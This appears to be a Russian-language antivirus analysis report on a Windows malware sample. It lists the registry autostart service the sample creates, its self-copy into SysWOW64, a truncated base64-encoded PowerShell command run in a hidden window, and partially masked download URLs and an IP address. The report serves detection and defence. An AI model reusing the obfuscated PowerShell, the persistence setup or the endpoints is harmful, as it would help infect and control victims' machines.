Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\ir41_qc] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\ir41_qc] 'ImagePath' = '"%WINDIR%\SysWOW64\scesrv\ir41_qc.exe"'
- 'ir41_qc' "%WINDIR%\SysWOW64\scesrv\ir41_qc.exe"
- 'ir41_qc' %WINDIR%\SysWOW64\scesrv\ir41_qc.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABNAG4AdgAyAHoAaABtAD0AKAAnAEIAJwArACcAOQBxACcAKwAoACcAdwB0ACcAKwAnADAAYgAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAGUAbgB2ADoAdQBTAEUAcgBwAFIATwBmAEkAbABlAFwAcQBlAGMAVABlA...
- %HOMEPATH%\qecte_l\dged3qj\ur74rq.exe
- %WINDIR%\syswow64\scesrv\ir41_qc.exe
- %HOMEPATH%\qecte_l\dged3qj\ur74rq.exe в %WINDIR%\syswow64\scesrv\ir41_qc.exe
- '24.##.32.186':80
- http://sw###aar.com/wp-admin/f3qB/
- http://24.##.32.186/zeTsvypSW77D4K7T/znVFrTPnqGx62H/hRZR47lIeYawsl3Uyb8/
- DNS ASK sw###aar.com
- '%HOMEPATH%\qecte_l\dged3qj\ur74rq.exe'
- '%WINDIR%\syswow64\scesrv\ir41_qc.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABNAG4AdgAyAHoAaABtAD0AKAAnAEIAJwArACcAOQBxACcAKwAoACcAdwB0ACcAKwAnADAAYgAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAGUAbgB2ADoAdQBTAEUAcgBwAFIATwBmAEkAbABlAFwAcQBlAGMAVABlA...' (со скрытым окном)